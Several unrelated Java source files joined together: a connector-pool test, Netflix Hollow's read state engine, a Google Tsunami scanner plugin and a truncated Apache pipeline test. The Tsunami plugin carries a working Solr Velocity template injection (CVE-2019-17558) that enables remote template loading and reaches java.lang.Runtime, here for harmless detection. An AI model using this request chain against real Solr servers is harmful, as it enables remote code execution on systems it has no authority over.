				ConnectorFactoryIcfImpl.CONNECTOR_SCHEMA_CONFIGURATION_PROPERTIES_ELEMENT_QNAME+")", configurationPropertiesDef);
		PrismSchema schemaIcfs = schemaRegistry.findSchemaByNamespace(ConnectorFactoryIcfImpl.NS_ICF_SCHEMA);
		assertNotNull("ICFS schema not found in the context ("+ConnectorFactoryIcfImpl.NS_ICF_SCHEMA+")", schemaIcfs);
	}

	/**
	 * Instantiate and configure the connector, then fetch the resource schema.
	 * Populates {@code cc} and {@code resourceSchema} for the following tests.
	 */
	@Test
	public void test020CreateConfiguredConnector() throws Exception {
		final String TEST_NAME = "test020CreateConfiguredConnector";
		TestUtil.displayTestTile(TEST_NAME);

		cc = connectorFactory.createConnectorInstance(connectorType,
				ResourceTypeUtil.getResourceNamespace(resourceType),
				"test connector");
		assertNotNull("Failed to instantiate connector", cc);
		OperationResult result = new OperationResult(TestUcfDummyMulti.class.getName() + "." + TEST_NAME);
		PrismContainerValue<ConnectorConfigurationType> configContainer =
				resourceType.getConnectorConfiguration().asPrismContainerValue();
		display("Configuration container", configContainer);

		// WHEN
		cc.configure(configContainer, result);

		// THEN
		result.computeStatus();
		TestUtil.assertSuccess(result);

		resourceSchema = cc.fetchResourceSchema(null, result);
		assertNotNull("No resource schema", resourceSchema);
	}

	/**
	 * Create a single account on the dummy resource; later search tests expect
	 * exactly this one account to exist.
	 */
	@Test
	public void test100AddAccount() throws Exception {
		final String TEST_NAME = "test100AddAccount";
		TestUtil.displayTestTile(this, TEST_NAME);
		OperationResult result = new OperationResult(this.getClass().getName() + "." + TEST_NAME);

		ObjectClassComplexTypeDefinition defaultAccountDefinition = resourceSchema.findDefaultObjectClassDefinition(ShadowKindType.ACCOUNT);
		ShadowType shadowType = new ShadowType();
		PrismTestUtil.getPrismContext().adopt(shadowType);
		shadowType.setName(PrismTestUtil.createPolyStringType(ACCOUNT_JACK_USERNAME));
		ObjectReferenceType resourceRef = new ObjectReferenceType();
		resourceRef.setOid(resource.getOid());
		shadowType.setResourceRef(resourceRef);
		shadowType.setObjectClass(defaultAccountDefinition.getTypeName());
		PrismObject<ShadowType> shadow = shadowType.asPrismObject();
		ResourceAttributeContainer attributesContainer = ShadowUtil.getOrCreateAttributesContainer(shadow, defaultAccountDefinition);
		ResourceAttribute<String> icfsNameProp = attributesContainer.findOrCreateAttribute(ConnectorFactoryIcfImpl.ICFS_NAME);
		icfsNameProp.setRealValue(ACCOUNT_JACK_USERNAME);

		// WHEN
		cc.addObject(shadow, null, null, result);

		// THEN
		DummyAccount dummyAccount = dummyResource.getAccountByUsername(ACCOUNT_JACK_USERNAME);
		assertNotNull("Account "+ACCOUNT_JACK_USERNAME+" was not created", dummyAccount);
		assertNotNull("Account "+ACCOUNT_JACK_USERNAME+" has no username", dummyAccount.getName());
	}

	/**
	 * A plain (non-blocking) search should find the one account and leave the
	 * connector pool with no active and one idle instance.
	 */
	@Test
	public void test110SearchNonBlocking() throws Exception {
		// Fixed: TEST_NAME previously said "test100SearchNonBlocking" (copy-paste error)
		final String TEST_NAME = "test110SearchNonBlocking";
		TestUtil.displayTestTile(TEST_NAME);

		// GIVEN
		final ObjectClassComplexTypeDefinition accountDefinition = resourceSchema.findDefaultObjectClassDefinition(ShadowKindType.ACCOUNT);
		// Determine object class from the schema

		final List<PrismObject<ShadowType>> searchResults = new ArrayList<PrismObject<ShadowType>>();

		ResultHandler<ShadowType> handler = new ResultHandler<ShadowType>() {
			@Override
			public boolean handle(PrismObject<ShadowType> shadow) {
				System.out.println("Search: found: " + shadow);
				checkUcfShadow(shadow, accountDefinition);
				searchResults.add(shadow);
				return true;
			}
		};

		OperationResult result = new OperationResult(this.getClass().getName() + "." + TEST_NAME);

		// WHEN
		cc.search(accountDefinition, new ObjectQuery(), handler, null, null, null, null, result);

		// THEN
		assertEquals("Unexpected number of search results", 1, searchResults.size());

		ConnectorOperationalStatus opStat = cc.getOperationalStatus();
		display("stats", opStat);
		assertEquals("Wrong pool active", (Integer)0, opStat.getPoolStatusNumActive());
		assertEquals("Wrong pool active", (Integer)1, opStat.getPoolStatusNumIdle());
	}

	/**
	 * While a search is blocked inside the resource, the pool must report one
	 * active instance; after unblocking, the search completes and the instance
	 * returns to the idle pool.
	 */
	@Test
	public void test200BlockingSearch() throws Exception {
		final String TEST_NAME = "test200BlockingSearch";
		TestUtil.displayTestTile(TEST_NAME);

		// GIVEN
		final OperationResult result = new OperationResult(this.getClass().getName() + "." + TEST_NAME);
		final ObjectClassComplexTypeDefinition accountDefinition = resourceSchema.findDefaultObjectClassDefinition(ShadowKindType.ACCOUNT);
		// Determine object class from the schema

		final List<PrismObject<ShadowType>> searchResults = new ArrayList<PrismObject<ShadowType>>();

		final ResultHandler<ShadowType> handler = new ResultHandler<ShadowType>() {
			@Override
			public boolean handle(PrismObject<ShadowType> shadow) {
				checkUcfShadow(shadow, accountDefinition);
				searchResults.add(shadow);
				return true;
			}
		};

		dummyResource.setBlockOperations(true);

		// WHEN
		Thread t = new Thread(new Runnable() {
			@Override
			public void run() {
				try {
					cc.search(accountDefinition, new ObjectQuery(), handler, null, null, null, null, result);
				} catch (CommunicationException | GenericFrameworkException | SchemaException
						| SecurityViolationException | ObjectNotFoundException e) {
					LOGGER.error("Error in the search: {}", e.getMessage(), e);
				}
			}
		});
		t.setName("search1");
		t.start();

		// Give the new thread a chance to get blocked
		// NOTE(review): fixed-duration sleep — potentially racy on a very slow machine
		Thread.sleep(500);

		ConnectorOperationalStatus opStat = cc.getOperationalStatus();
		display("stats (blocked)", opStat);
		assertEquals("Wrong pool active", (Integer)1, opStat.getPoolStatusNumActive());
		assertEquals("Wrong pool active", (Integer)0, opStat.getPoolStatusNumIdle());

		assertEquals("Unexpected number of search results", 0, searchResults.size());

		dummyResource.unblock();

		t.join();

		dummyResource.setBlockOperations(false);

		// THEN
		assertEquals("Unexpected number of search results", 1, searchResults.size());

		opStat = cc.getOperationalStatus();
		display("stats (final)", opStat);
		assertEquals("Wrong pool active", (Integer)0, opStat.getPoolStatusNumActive());
		assertEquals("Wrong pool active", (Integer)1, opStat.getPoolStatusNumIdle());

		PrismObject<ShadowType> searchResult = searchResults.get(0);
		display("Search result", searchResult);
	}

	/**
	 * Two concurrently blocked searches must force the pool to two active
	 * instances; after unblocking, both searches complete and both instances
	 * return to the idle pool.
	 */
	@Test
	public void test210TwoBlockingSearches() throws Exception {
		final String TEST_NAME = "test210TwoBlockingSearches";
		TestUtil.displayTestTile(TEST_NAME);

		// GIVEN
		final ObjectClassComplexTypeDefinition accountDefinition = resourceSchema.findDefaultObjectClassDefinition(ShadowKindType.ACCOUNT);
		// Determine object class from the schema

		final OperationResult result1 = new OperationResult(this.getClass().getName() + "." + TEST_NAME);
		final List<PrismObject<ShadowType>> searchResults1 = new ArrayList<PrismObject<ShadowType>>();
		final ResultHandler<ShadowType> handler1 = new ResultHandler<ShadowType>() {
			@Override
			public boolean handle(PrismObject<ShadowType> shadow) {
				checkUcfShadow(shadow, accountDefinition);
				searchResults1.add(shadow);
				return true;
			}
		};

		final OperationResult result2 = new OperationResult(this.getClass().getName() + "." + TEST_NAME);
		final List<PrismObject<ShadowType>> searchResults2 = new ArrayList<PrismObject<ShadowType>>();
		final ResultHandler<ShadowType> handler2 = new ResultHandler<ShadowType>() {
			@Override
			public boolean handle(PrismObject<ShadowType> shadow) {
				checkUcfShadow(shadow, accountDefinition);
				searchResults2.add(shadow);
				return true;
			}
		};

		dummyResource.setBlockOperations(true);

		// WHEN
		Thread t1 = new Thread(new Runnable() {
			@Override
			public void run() {
				try {
					cc.search(accountDefinition, new ObjectQuery(), handler1, null, null, null, null, result1);
				} catch (CommunicationException | GenericFrameworkException | SchemaException
						| SecurityViolationException | ObjectNotFoundException e) {
					LOGGER.error("Error in the search: {}", e.getMessage(), e);
				}
			}
		});
		t1.setName("search1");
		t1.start();

		// Give the new thread a chance to get blocked
		// NOTE(review): fixed-duration sleep — potentially racy on a very slow machine
		Thread.sleep(500);

		ConnectorOperationalStatus opStat = cc.getOperationalStatus();
		display("stats (blocked 1)", opStat);
		assertEquals("Wrong pool active", (Integer)1, opStat.getPoolStatusNumActive());
		assertEquals("Wrong pool active", (Integer)0, opStat.getPoolStatusNumIdle());

		assertEquals("Unexpected number of search results", 0, searchResults1.size());

		Thread t2 = new Thread(new Runnable() {
			@Override
			public void run() {
				try {
					cc.search(accountDefinition, new ObjectQuery(), handler2, null, null, null, null, result2);
				} catch (CommunicationException | GenericFrameworkException | SchemaException
						| SecurityViolationException | ObjectNotFoundException e) {
					LOGGER.error("Error in the search: {}", e.getMessage(), e);
				}
			}
		});
		t2.setName("search2");
		t2.start();

		// Give the new thread a chance to get blocked
		Thread.sleep(500);

		opStat = cc.getOperationalStatus();
		display("stats (blocked 2)", opStat);
		assertEquals("Wrong pool active", (Integer)2, opStat.getPoolStatusNumActive());
		assertEquals("Wrong pool active", (Integer)0, opStat.getPoolStatusNumIdle());

		assertEquals("Unexpected number of search results", 0, searchResults1.size());

		dummyResource.unblockAll();

		t1.join();
		t2.join();

		dummyResource.setBlockOperations(false);

		// THEN
		assertEquals("Unexpected number of search results 1", 1, searchResults1.size());
		assertEquals("Unexpected number of search results 2", 1, searchResults2.size());

		opStat = cc.getOperationalStatus();
		display("stats (final)", opStat);
		assertEquals("Wrong pool active", (Integer)0, opStat.getPoolStatusNumActive());
		assertEquals("Wrong pool active", (Integer)2, opStat.getPoolStatusNumIdle());

		PrismObject<ShadowType> searchResult1 = searchResults1.get(0);
		display("Search result 1", searchResult1);
		PrismObject<ShadowType> searchResult2 = searchResults2.get(0);
		display("Search result 2", searchResult2);
	}

	/**
	 * Assert that a shadow returned by the UCF search carries the expected
	 * object class and a non-empty attribute container.
	 */
	private void checkUcfShadow(PrismObject<ShadowType> shadow, ObjectClassComplexTypeDefinition objectClassDefinition) {
		assertNotNull("No objectClass in shadow "+shadow, shadow.asObjectable().getObjectClass());
		assertEquals("Wrong objectClass in shadow "+shadow, objectClassDefinition.getTypeName(), shadow.asObjectable().getObjectClass());
		Collection<ResourceAttribute<?>> attributes = ShadowUtil.getAttributes(shadow);
		assertNotNull("No attributes in shadow "+shadow, attributes);
		assertFalse("Empty attributes in shadow "+shadow, attributes.isEmpty());
	}

}
/* * Copyright 2016-2019 Netflix, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * */ package com.netflix.hollow.core.read.engine; import com.netflix.hollow.api.error.SchemaNotFoundException; import com.netflix.hollow.core.HollowStateEngine; import com.netflix.hollow.core.memory.pool.ArraySegmentRecycler; import com.netflix.hollow.core.memory.pool.RecyclingRecycler; import com.netflix.hollow.core.read.dataaccess.HollowDataAccess; import com.netflix.hollow.core.read.dataaccess.HollowTypeDataAccess; import com.netflix.hollow.core.read.engine.map.HollowMapTypeReadState; import com.netflix.hollow.core.read.engine.set.HollowSetTypeReadState; import com.netflix.hollow.core.read.missing.DefaultMissingDataHandler; import com.netflix.hollow.core.read.missing.MissingDataHandler; import com.netflix.hollow.core.schema.HollowListSchema; import com.netflix.hollow.core.schema.HollowMapSchema; import com.netflix.hollow.core.schema.HollowObjectSchema; import com.netflix.hollow.core.schema.HollowSchema; import com.netflix.hollow.core.schema.HollowSetSchema; import com.netflix.hollow.core.util.DefaultHashCodeFinder; import com.netflix.hollow.core.util.HollowObjectHashCodeFinder; import java.util.ArrayList; import java.util.Collection; import java.util.Collections; import java.util.HashMap; import java.util.HashSet; import java.util.List; import java.util.Map; import java.util.Set; /** * A HollowReadStateEngine is our main handle to the current state of a Hollow dataset as a data consumer. 
* <p> * A dataset changes over time. A core concept in Hollow is that the timeline for a changing dataset can be * broken down into discrete data states, each of which is a complete snapshot of the data at a particular point in time. * Data consumers handle data states with a HollowReadStateEngine. */ public class HollowReadStateEngine implements HollowStateEngine, HollowDataAccess { private final Map<String, HollowTypeReadState> typeStates; private final Map<String, List<HollowTypeStateListener>> listeners; private final HollowObjectHashCodeFinder hashCodeFinder; private final boolean listenToAllPopulatedOrdinals; private boolean skipTypeShardUpdateWithNoAdditions; private ArraySegmentRecycler memoryRecycler; private Map<String,String> headerTags; private Set<String> typesWithDefinedHashCodes = new HashSet<String>(); private long currentRandomizedTag; private MissingDataHandler missingDataHandler = new DefaultMissingDataHandler(); public HollowReadStateEngine() { this(DefaultHashCodeFinder.INSTANCE, true, new RecyclingRecycler()); } public HollowReadStateEngine(boolean listenToAllPopulatedOrdinals) { this(DefaultHashCodeFinder.INSTANCE, listenToAllPopulatedOrdinals, new RecyclingRecycler()); } public HollowReadStateEngine(ArraySegmentRecycler recycler) { this(DefaultHashCodeFinder.INSTANCE, true, recycler); } public HollowReadStateEngine(boolean listenToAllPopulatedOrdinals, ArraySegmentRecycler recycler) { this(DefaultHashCodeFinder.INSTANCE, listenToAllPopulatedOrdinals, recycler); } @Deprecated public HollowReadStateEngine(HollowObjectHashCodeFinder hashCodeFinder) { this(hashCodeFinder, true, new RecyclingRecycler()); } @Deprecated public HollowReadStateEngine(HollowObjectHashCodeFinder hashCodeFinder, boolean listenToAllPopulatedOrdinals, ArraySegmentRecycler recycler) { this.typeStates = new HashMap<String, HollowTypeReadState>(); this.listeners = new HashMap<String, List<HollowTypeStateListener>>(); this.hashCodeFinder = hashCodeFinder; this.memoryRecycler 
= recycler; this.listenToAllPopulatedOrdinals = listenToAllPopulatedOrdinals; } @Override public HollowObjectHashCodeFinder getHashCodeFinder() { return hashCodeFinder; } protected void addTypeState(HollowTypeReadState typeState) { typeStates.put(typeState.getSchema().getName(), typeState); if(listenToAllPopulatedOrdinals) { typeState.addListener(new PopulatedOrdinalListener()); } List<HollowTypeStateListener> list = listeners.get(typeState.getSchema().getName()); if(list != null) { for(HollowTypeStateListener listener : list) typeState.addListener(listener); } } /** * Add a {@link HollowTypeStateListener} to a type. * * @param typeName the type name * @param listener the listener to add */ public void addTypeListener(String typeName, HollowTypeStateListener listener) { List<HollowTypeStateListener> list = listeners.get(typeName); if(list == null) { list = new ArrayList<HollowTypeStateListener>(); listeners.put(typeName, list); } list.add(listener); HollowTypeReadState typeState = typeStates.get(typeName); if(typeState != null) typeState.addListener(listener); } void wireTypeStatesToSchemas() { for(HollowTypeReadState state : typeStates.values()) { switch(state.getSchema().getSchemaType()) { case OBJECT: HollowObjectSchema objSchema = (HollowObjectSchema)state.getSchema(); for(int i=0;i<objSchema.numFields();i++) { if(objSchema.getReferencedType(i) != null) objSchema.setReferencedTypeState(i, typeStates.get(objSchema.getReferencedType(i))); } break; case LIST: HollowListSchema listSchema = (HollowListSchema)state.getSchema(); listSchema.setElementTypeState(typeStates.get(listSchema.getElementType())); break; case SET: HollowSetSchema setSchema = (HollowSetSchema)state.getSchema(); setSchema.setElementTypeState(typeStates.get(setSchema.getElementType())); ((HollowSetTypeReadState)state).buildKeyDeriver(); break; case MAP: HollowMapSchema mapSchema = (HollowMapSchema)state.getSchema(); mapSchema.setKeyTypeState(typeStates.get(mapSchema.getKeyType())); 
mapSchema.setValueTypeState(typeStates.get(mapSchema.getValueType())); ((HollowMapTypeReadState)state).buildKeyDeriver(); break; } } } /** * Calculates the data size of a read state engine which is defined as the approximate heap footprint by iterating * over the read state shards in each type state * @return the heap footprint of the read state engine */ public long calcApproxDataSize() { return this.getAllTypes() .stream() .map(this::getTypeState) .mapToLong(HollowTypeReadState::getApproximateHeapFootprintInBytes) .sum(); } @Override public HollowTypeDataAccess getTypeDataAccess(String type) { return typeStates.get(type); } @Override public HollowTypeDataAccess getTypeDataAccess(String type, int ordinal) { return typeStates.get(type); } @Override public Collection<String> getAllTypes() { return typeStates.keySet(); } public HollowTypeReadState getTypeState(String type) { return typeStates.get(type); } public Collection<HollowTypeReadState> getTypeStates() { return typeStates.values(); } public ArraySegmentRecycler getMemoryRecycler() { return memoryRecycler; } public boolean isListenToAllPopulatedOrdinals() { return listenToAllPopulatedOrdinals; } /** * Experimental: When there are no updates for a type shard in a delta, skip updating that type shard. */ public void setSkipTypeShardUpdateWithNoAdditions(boolean skipTypeShardUpdateWithNoAdditions) { this.skipTypeShardUpdateWithNoAdditions = skipTypeShardUpdateWithNoAdditions; } public boolean isSkipTypeShardUpdateWithNoAdditions() { return skipTypeShardUpdateWithNoAdditions; } @Override public List<HollowSchema> getSchemas() { List<HollowSchema> schemas = new ArrayList<HollowSchema>(); for(Map.Entry<String, HollowTypeReadState> entry : typeStates.entrySet()) { schemas.add(entry.getValue().getSchema()); } return schemas; } @Override public HollowSchema getSchema(String type) { HollowTypeReadState typeState = getTypeState(type); return typeState == null ? 
null : typeState.getSchema(); } @Override public HollowSchema getNonNullSchema(String type) { HollowSchema schema = getSchema(type); if (schema == null) { throw new SchemaNotFoundException(type, getAllTypes()); } return schema; } protected void afterInitialization() { } public void setMissingDataHandler(MissingDataHandler handler) { this.missingDataHandler = handler; } @Override public MissingDataHandler getMissingDataHandler() { return missingDataHandler; } public void setHeaderTags(Map<String, String> headerTags) { this.headerTags = headerTags; populatedDefinedHashCodesTypesIfHeaderTagIsPresent(); } @Override public Map<String, String> getHeaderTags() { return headerTags; } @Override public String getHeaderTag(String name) { return headerTags.get(name); } public void invalidate() { listeners.clear(); for(Map.Entry<String, HollowTypeReadState> entry : typeStates.entrySet()) entry.getValue().invalidate(); memoryRecycler = null; } @Override public void resetSampling() { for(Map.Entry<String, HollowTypeReadState> entry : typeStates.entrySet()) entry.getValue().getSampler().reset(); } @Override public boolean hasSampleResults() { for(Map.Entry<String, HollowTypeReadState> entry : typeStates.entrySet()) if(entry.getValue().getSampler().hasSampleResults()) return true; return false; } public boolean updatedLastCycle() { for(Map.Entry<String, HollowTypeReadState> entry : typeStates.entrySet()) { if(entry.getValue().getListener(PopulatedOrdinalListener.class).updatedLastCycle()) return true; } return false; } public Set<String> getTypesWithDefinedHashCodes() { return typesWithDefinedHashCodes; } public long getCurrentRandomizedTag() { return currentRandomizedTag; } public void setCurrentRandomizedTag(long currentRandomizedTag) { this.currentRandomizedTag = currentRandomizedTag; } private void populatedDefinedHashCodesTypesIfHeaderTagIsPresent() { String definedHashCodesTag = headerTags.get(HollowObjectHashCodeFinder.DEFINED_HASH_CODES_HEADER_NAME); if(definedHashCodesTag 
== null || "".equals(definedHashCodesTag)) { this.typesWithDefinedHashCodes = Collections.<String>emptySet(); } else { Set<String>definedHashCodeTypes = new HashSet<String>(); for(String type : definedHashCodesTag.split(",")) definedHashCodeTypes.add(type); this.typesWithDefinedHashCodes = definedHashCodeTypes; } } }
/* * Copyright 2020 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.tsunami.plugins.detectors.rce; import static com.google.common.base.Preconditions.checkNotNull; import static com.google.common.collect.ImmutableList.toImmutableList; import static com.google.tsunami.common.net.http.HttpRequest.get; import static com.google.tsunami.common.net.http.HttpRequest.post; import com.google.common.collect.ImmutableList; import com.google.common.flogger.GoogleLogger; import com.google.gson.JsonElement; import com.google.protobuf.ByteString; import com.google.protobuf.util.Timestamps; import com.google.tsunami.common.data.NetworkServiceUtils; import com.google.tsunami.common.net.http.HttpClient; import com.google.tsunami.common.net.http.HttpResponse; import com.google.tsunami.common.time.UtcClock; import com.google.tsunami.plugin.PluginType; import com.google.tsunami.plugin.VulnDetector; import com.google.tsunami.plugin.annotations.PluginInfo; import com.google.tsunami.proto.DetectionReport; import com.google.tsunami.proto.DetectionReportList; import com.google.tsunami.proto.DetectionStatus; import com.google.tsunami.proto.NetworkService; import com.google.tsunami.proto.Severity; import com.google.tsunami.proto.TargetInfo; import com.google.tsunami.proto.Vulnerability; import com.google.tsunami.proto.VulnerabilityId; import java.io.IOException; import java.time.Clock; import java.time.Instant; import javax.inject.Inject; /** A {@link VulnDetector} that 
detects CVE-2019-17558 in Apache Solr */ @PluginInfo( type = PluginType.VULN_DETECTION, name = "SolrVelocityTemplateRceDetector", version = "0.1", description = "Tsunami detector plugin for Apache Solr Remote Code Execution through the" + " VelocityResponseWriter (CVE-2019-17558).", author = "Tsunami Team (tsunami-dev@google.com)", bootstrapModule = SolrVelocityTemplateRceDetectorBootstrapModule.class) public final class SolrVelocityTemplateRceDetector implements VulnDetector { private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); private final Clock utcClock; private final HttpClient httpClient; @Inject SolrVelocityTemplateRceDetector(@UtcClock Clock utcClock, HttpClient httpClient) { this.utcClock = checkNotNull(utcClock); this.httpClient = checkNotNull(httpClient); } @Override public DetectionReportList detect( TargetInfo targetInfo, ImmutableList<NetworkService> matchedServices) { return DetectionReportList.newBuilder() .addAllDetectionReports( matchedServices.stream() .filter(NetworkServiceUtils::isWebService) .filter(this::isServiceVulnerable) .map(networkService -> buildDetectionReport(targetInfo, networkService)) .collect(toImmutableList())) .build(); } private boolean isServiceVulnerable(NetworkService networkService) { String writerName = "tsunami-" + utcClock.millis(); ImmutableList<String> cores = getCores(networkService); for (String core : cores) { if (createResponseWriter(networkService, core, writerName)) { // Ensure that we cleanup the response writer we just created. 
try { if (performExploit(networkService, core, writerName)) { return true; } } finally { cleanupResponseWriter(networkService, core, writerName); } } } return false; } private ImmutableList<String> getCores(NetworkService networkService) { String targetUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + "solr/admin/cores?wt=json&indexInfo=false&_=" + utcClock.millis(); try { HttpResponse response = httpClient.send(get(targetUri).withEmptyHeaders().build(), networkService); try { if (!response.bodyJson().isPresent()) { return ImmutableList.of(); } JsonElement json = response.bodyJson().get(); return ImmutableList.copyOf( json.getAsJsonObject().get("status").getAsJsonObject().keySet()); } catch (Throwable t) { logger.atInfo().log("Failed to parse cores response json"); return ImmutableList.of(); } } catch (IOException e) { logger.atWarning().withCause(e).log("Unable to query '%s'.", targetUri); return ImmutableList.of(); } } private boolean createResponseWriter( NetworkService networkService, String core, String writerName) { String targetUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + "solr/" + core + "/config"; String payload = String.format( "{" + "\"add-queryresponsewriter\": {" + "\"startup\": \"lazy\"," + "\"name\": \"%s\"," + "\"class\": \"solr.VelocityResponseWriter\"," + "\"template.base.dir\": \"\"," + "\"solr.resource.loader.enabled\": \"true\"," + "\"params.resource.loader.enabled\": \"true\"" + "}" + "}", writerName); try { HttpResponse response = httpClient.send( post(targetUri) .withEmptyHeaders() .setRequestBody(ByteString.copyFrom(payload, "UTF8")) .build(), networkService); return response.status().code() == 200; } catch (IOException e) { logger.atWarning().withCause(e).log("Unable to POST '%s'.", targetUri); return false; } } private boolean performExploit(NetworkService networkService, String core, String writerName) { String targetUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + 
"solr/" + core + "/select?q=1&&wt=" + writerName + "&v.template=custom&v.template.custom=" + "%23set($x='TSUNAMI')+" + "%23set($str=$x.toLowerCase().substring(4)%2b$x.substring(0,4))+" + "%23set($mem=$x.class.forName('java.lang.Runtime').getRuntime().totalMemory())+" + "$str+$mem+$str"; try { HttpResponse response = httpClient.send(get(targetUri).withEmptyHeaders().build(), networkService); if (response.status().code() != 200) { return false; } try { // A failed rce will include json in the response. Attempt to parse it and catch parsing // errors to find the response. response.bodyJson(); return false; } catch (Throwable t) { String responseStr = response.bodyString().get(); logger.atInfo().log("Got response from java injection: %s", responseStr); return responseStr.matches(".*amiTSUN [0-9]+ amiTSUN.*"); } } catch (IOException e) { logger.atWarning().withCause(e).log("Unable to query '%s'.", targetUri); return false; } } private void cleanupResponseWriter( NetworkService networkService, String core, String writerName) { String targetUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + "solr/" + core + "/config"; String payload = String.format("{\"delete-queryresponsewriter\": \"%s\"}", writerName); try { HttpResponse response = httpClient.send( post(targetUri) .withEmptyHeaders() .setRequestBody(ByteString.copyFrom(payload, "UTF8")) .build(), networkService); if (response.status().code() != 200) { logger.atWarning().log("Unable to cleanup response writer"); } } catch (IOException e) { logger.atWarning().withCause(e).log("Unable to POST '%s'.", targetUri); } } private DetectionReport buildDetectionReport( TargetInfo targetInfo, NetworkService vulnerableNetworkService) { return DetectionReport.newBuilder() .setTargetInfo(targetInfo) .setNetworkService(vulnerableNetworkService) .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) .setVulnerability( 
Vulnerability.newBuilder() .setMainId( VulnerabilityId.newBuilder().setPublisher("GOOGLE").setValue("CVE_2019_17558")) .setSeverity(Severity.CRITICAL) .setTitle("Apache Solr Velocity Template RCE (CVE-2019-17558)") .setDescription( "Apache Solr 5.0.0 to Apache Solr 8.3.1 are vulnerable to a Remote Code" + " Execution through the VelocityResponseWriter. A Velocity template can" + " be provided through Velocity templates in a configset `velocity/`" + " directory or as a parameter. A user defined configset could contain" + " renderable, potentially malicious, templates. Parameter provided" + " templates are disabled by default, but can be enabled by setting" + " `params.resource.loader.enabled` by defining a response writer with" + " that setting set to `true`. Defining a response writer requires" + " configuration API access. Solr 8.4 removed the params resource loader" + " entirely, and only enables the configset-provided template rendering" + " when the configset is `trusted` (has been uploaded by an authenticated" + " user).")) .build(); } }
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.commons.pipeline; import java.util.Collection; import java.util.Collections; import java.util.EventObject; import junit.framework.Test; import junit.framework.TestCase; import junit.framework.TestSuite; import org.apache.commons.pipeline.driver.SynchronousStageDriverFactory; import org.apache.commons.pipeline.event.ObjectProcessedEvent; import org.apache.commons.pipeline.listener.ObjectProcessedEventCounter; import org.apache.commons.pipeline.testFramework.TestStage; /** * Test cases */ public class PipelineTest extends TestCase { public PipelineTest(String testName) { super(testName); } public static Test suite() { TestSuite suite = new TestSuite(PipelineTest.class); return suite; } /** * Test of registerListener method, of class org.apache.commons.pipeline.Pipeline. */ public void testRegisterListener() { StageEventListener listener = new ObjectProcessedEventCounter(); Pipeline instance = new Pipeline(); instance.registerListener(listener); assertEquals(1, instance.getRegisteredListeners().size()); } /** * Test of getRegisteredListeners method, of class org.apache.commons.pipeline.Pipeline. 
*/ public void testGetRegisteredListeners() { Pipeline instance = new Pipeline(); Collection<StageEventListener> expResult = Collections.EMPTY_LIST; Collection<StageEventListener> result = instance.getRegisteredListeners(); assertEquals(expResult, result); } /** * Test of raise method, of class org.apache.commons.pipeline.Pipeline. */ public void testRaise() throws Exception { Stage testStage = new TestStage(0); EventObject ev = new ObjectProcessedEvent(testStage, "Hello, World!"); Pipeline instance = new Pipeline(); ObjectProcessedEventCounter counter = new ObjectProcessedEventCounter(); instance.registerListener(counter); instance.raise(ev); synchronized(counter) { while (counter.getCounts().get(testStage) == null) counter.wait(100); } assertNotNull("No events were received.", counter.getCounts().get(testStage)); assertEquals("Only one event should have been received.", 1, counter.getCounts().get(testStage).intValue()); } public void testRaiseOnBranch() throws Exception { Pipeline root = new Pipeline(); Pipeline branch1 = new Pipeline(); root.addBranch("b1", branch1); Pipeline branch2 = new Pipeline(); root.addBranch("b2", branch2); ObjectProcessedEventCounter counter = new ObjectProcessedEventCounter(); branch2.registerListener(counter); Stage testStage = new TestStage(0); EventObject ev = new ObjectProcessedEvent(testStage, "Hello, World!"); branch1.raise(ev); synchronized(counter) { while (counter.getCounts().get(testStage) == null) counter.wait(100); } assertNotNull(counter.getCounts().get(testStage)); assertEquals(1, counter.getCounts().get(testStage).intValue()); } /** * Test of getDownstreamFeeder method, of class org.apache.commons.pipeline.Pipeline. 
*/ public void testGetDownstreamFeeder() throws Exception { Stage stage1 = new TestStage(0); Stage stage2 = new TestStage(1); StageDriverFactory sdf = new SynchronousStageDriverFactory(); Pipeline instance = new Pipeline(); instance.addStage(stage1, sdf); instance.addStage(stage2, sdf); Feeder expResult = instance.getStageDriver(stage2).getFeeder(); Feeder result = instance.getDownstreamFeeder(stage1); assertSame(expResult, result); } /** * Test of getBranchFeeder method, of class org.apache.commons.pipeline.Pipeline. */ public void testGetBranchFeeder() throws Exception { String branchKey = "b1"; Pipeline root = new Pipeline(); Pipeline branch = new Pipeline(); root.addBranch(branchKey, branch); Feeder expResult = branch.getTerminalFeeder(); //no feeders registered Feeder result = root.getBranchFeeder(branchKey); assertSame(expResult, result); StageDriverFactory sdf = new SynchronousStageDriverFactory(); Stage testStage = new TestStage(0); branch.addStage(testStage, sdf); expResult = branch.getStageDriver(testStage).getFeeder(); result = root.getBranchFeeder(branchKey); assertSame(expResult, result); } // /** // * Test of addStage method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testAddStage() throws Exception { // System.out.println("addStage"); // // Stage stage = null; // StageDriverFactory driverFactory = null; // Pipeline instance = new Pipeline(); // // instance.addStage(stage, driverFactory); // // fail("The test case is a prototype."); // } // // /** // * Test of getStages method, of class 